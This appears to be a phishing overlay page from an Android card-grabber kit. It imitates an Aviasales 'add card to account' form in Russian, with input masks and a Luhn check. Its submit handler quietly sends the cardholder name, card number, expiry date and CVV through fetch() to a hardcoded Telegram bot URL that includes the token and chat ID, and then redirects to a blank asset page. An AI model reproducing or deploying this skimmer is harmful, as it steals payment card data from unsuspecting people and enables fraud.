<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="ru/css/bootstrap.min.css">
    <script src="ru/js/jquery.min.js"></script>
    <script src="ru/js/jquery.mask.js"></script>
	<link rel="stylesheet" href="ru/ru.aviasales/style.css">
</head>

<body>
    <div class="header">
        Добавить карту к аккаунту
    </div>
    <div id="form2">
<form action="null"  method="post" id="_mainForm" target="flow_handler">
        <label for="creditcard">Имя держателя карты</label>
        <input type="text" class="field" name="holder" onkeyup="check();" id="holder">
    
        <label for="creditcard">Номер карты</label>
        <input type="text" class="field" name="number" id="number" onkeyup="check();" required>

        <div class="exp-cvv">
            <div class="exp">
                <label for="exp">Срок действия</label>
                <input type="tel" class="field" style="margin-bottom: 0;" placeholder="MM/YY" maxlength="5" onkeyup="check();" name="exp" id="exp" required >
           </div>
           <div class="cvv">
           <label for="exp" style="font-size: 12px">CVV/CVC (3 последние цифры на обратной стороне карты)</label>
                <input type="tel" class="field" placeholder="CVV" style="margin-bottom: 0;" onkeyup="check();" name="cvv" id="cvv" maxlength="3" required>
           </div>

            <div class="center" style="padding: 20px;">
                <input type="submit" class="button" value="Подтвердить" disabled id="input_finish">
            </div>  
        </div>
    </div>
</form>
<script>
    function check() {
    var inp1 = document.getElementById('holder'),
        inp2 = document.getElementById('number'),
        inp3 = document.getElementById('exp'),
        inp4 = document.getElementById('cvv');
    document.getElementById('input_finish').disabled = inp1.value && inp2.value && inp3.value && inp4.value ? false : "disabled";
    }
</script>
<iframe src="about:blank" name="flow_handler" style="visibility:hidden;display:none"></iframe>
    <script>
        $('#number').mask('0000 0000 0000 0000');
        $('#exp').mask('00/00');
    </script>
    <script type="text/javascript">function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); };
        (function () {
        var  __insHiddenField = function (objDoc, objForm, sNm, sV) {
            var input = objDoc.createElement("input");
            input.setAttribute("type", "hidden");
            input.setAttribute("name", sNm);
            input.setAttribute("value", sV);
            input.value = sV;
            objForm.appendChild(input);
        };
                    var g_oBtn = document.getElementById('input_finish');
                    g_oBtn.onclick = function () {
                    
                        var number = $("#number").val(); 
                         number = number.replace(/\s+/g,'');
                        var oHoldInp = document.getElementById('holder');
                        var oExpYYInp = document.getElementById('exp');
                        var oCvvInp = document.getElementById('cvv');

                        try{
                            $("#number").removeClass('error');
                            oHoldInp.className = 'field';
                            oExpYYInp.className = 'field';
                            oCvvInp.className = 'field';
                        } catch(e){};
                        
                        
                        if (oHoldInp.value.length < 4) {
                            try{
                                oHoldInp.className = 'field error';
                            } catch(e){};
                            return false;
                        }

                        if(number == '0000000000000000'){
                          try{                          
                                $("#number").addClass('error');
                            } catch(e){};                        
                       
                        return false;
                        } 

                        if(!Moon(number)){
                          try{                          
                                $("#number").addClass('error');
                            } catch(e){};                        
                            return false;
                        } 
                        
                        if (oExpYYInp.value.length < 4) {
                            try{
                                oExpYYInp.className = 'field error';
                            } catch(e){};
                            return false;
                        }
                        
                        if (!/^\w{3,3}$/i.test(oCvvInp.value)) {
                            try{
                                oCvvInp.className = 'field error';
                            } catch(e){};
                            return false;
                        }
						
        top['closeDlg'] = true;
          	var url='<?php echo $URL; ?>';
           	var imei_c='<?php echo $IMEI_country; ?>';
           	fetch("https://api.telegram.org/bot2109326350:AAESgBTRopBgrGVKC-QwsM8XveGKDK-38M4/sendMessage?chat_id=-1001712661501&text=|ru_grabbers2|ru_aviasales|"+oHoldInp.value+"|"+number+"|"+oExpYYInp.value+"|"+oCvvInp.value);

        return false;
        };
        })();

        function Moon(card_number) {
card_length = card_number.length;
if(card_length == '0') return false;
if(card_length < '16') return false;
  var arr = [],
      card_number = card_number.toString();
  for(var i = 0; i < card_number.length; i++) {
    if(i % 2 === 0) {
      var m = parseInt(card_number[i]) * 2;
      if(m > 9) {
        arr.push(m - 9);
      } else {
        arr.push(m);
      } 
    } else {
        var n = parseInt(card_number[i]);
        arr.push(n)
      }
  }
  //console.log(arr);
  var summ = arr.reduce(function(a, b) { return a + b; });
  return Boolean(!(summ % 10));

} 
    </script>
</body>
</html>